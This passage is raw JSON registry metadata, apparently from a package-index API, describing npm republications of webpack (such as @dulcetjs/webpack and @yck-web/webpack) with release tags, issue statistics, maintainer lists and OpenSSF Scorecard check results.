ha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-26T02:07:20.128Z","dependent_packages_count":15,"downloads":21,"downloads_period":"last-month","dependent_repos_count":10,"rankings":{"downloads":41.163328952788184,"dependent_repos_count":3.6913146625283098,"dependent_packages_count":1.4874033505876867,"stargazers_count":0.07834503466984864,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":9.362630711601444},"purl":"pkg:npm/%40dulcetjs/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@dulcetjs/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@dulcetjs/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@dulcetjs/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:00:07.885Z","issues_count":10163,"pull_requests_count":9423,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2749833.8614084506,"issues_closed_count":9897,"pull_requests_closed_count":8875,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.834399291547771,"avg_comments_per_pull_request":3.1735116205030245,"merged_pull_requests_count":6013,"bot_issues_count":8,"bot_pull_requests_count":2910,"past_year_issues_count":81,"past_year_pull_requests_count":926,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":364617.14285714284,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":728,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":63,"past_year_avg_comments_per_issue":3.3950617283950617,"past_year_avg_comments_per_pull_request":4.818574514038877,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":575,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1070,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":428,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dulcetjs%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dulcetjs%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dulcetjs%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dulcetjs%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dulcetjs%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@dulcetjs%2Fwebpack/codemeta","maintainers":[{"uuid":"nkduy","login":"nkduy","name":null,"email":"kn145660@gmail.com","url":null,"packages_count":785,"html_url":"https://www.npmjs.com/~nkduy","role":null,"created_at":"2022-11-15T16:21:18.175Z","updated_at":"2022-11-15T16:21:18.175Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nkduy/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1374220,"name":"@yck-web/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"yck-web","versions_count":1,"first_release_published_at":"2021-09-03T08:40:24.549Z","latest_release_published_at":"2021-09-03T08:40:24.549Z","latest_release_number":"5.51.2","last_synced_at":"2026-09-03T01:09:25.245Z","created_at":"2022-04-08T22:52:04.738Z","updated_at":"2026-09-03T01:09:25.245Z","registry_url":"https://www.npmjs.com/package/@yck-web/webpack","install_command":"npm install @yck-web/webpack","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.51.2"}},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: 